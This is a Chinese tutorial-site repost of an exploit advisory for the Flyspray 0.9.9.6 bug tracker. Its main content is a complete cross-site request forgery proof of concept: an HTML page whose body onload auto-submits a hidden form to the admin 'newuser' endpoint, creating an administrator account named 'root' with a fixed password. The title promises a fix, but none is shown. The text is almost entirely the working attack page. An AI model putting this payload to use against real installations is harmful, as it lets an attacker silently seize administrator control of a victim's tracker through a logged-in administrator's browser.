网站地图    收藏   

主页 > 后端 > 网站安全 >

Flyspray 0.9.9.6 CSRF及修复 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: Flyspray 0.9.9.6 CSRF Vulnerability作者: Vaibhav Gupta下载地址: http://flyspray.org/flyspray-0.9.9.6.zip影响版本: 0.9.9.6+---+[CSRF添加管理账号]+---+htmlbody onload=javascript:d......

标题: Flyspray 0.9.9.6 CSRF Vulnerability
作者: Vaibhav Gupta
下载地址: http://flyspray.org/flyspray-0.9.9.6.zip
影响版本: 0.9.9.6
+---+[CSRF添加管理账号]+---+
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add ADMIN account</H2>
<form method="POST" name="form0" action="http:// www.2cto.com /flyspray-0.9.9.6/index.php?do=admin&area=newuser">
<input type="hidden" name="action" value="admin.newuser"/>
<input type="hidden" name="do" value="admin"/>
<input type="hidden" name="area" value="newuser"/>
<input type="hidden" name="user_name" value="root"/>
<input type="hidden" name="user_pass" value="12345678"/>
<input type="hidden" name="user_pass2" value="12345678"/>
<input type="hidden" name="real_name" value="root"/>
<input type="hidden" name="email_address" value="root@root.com"/>
<input type="hidden" name="jabber_id" value=""/>
<input type="hidden" name="notify_type" value="0"/>
<input type="hidden" name="time_zone" value="0"/>
<input type="hidden" name="group_in" value="1"/>
</form>
</body>
</html>

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论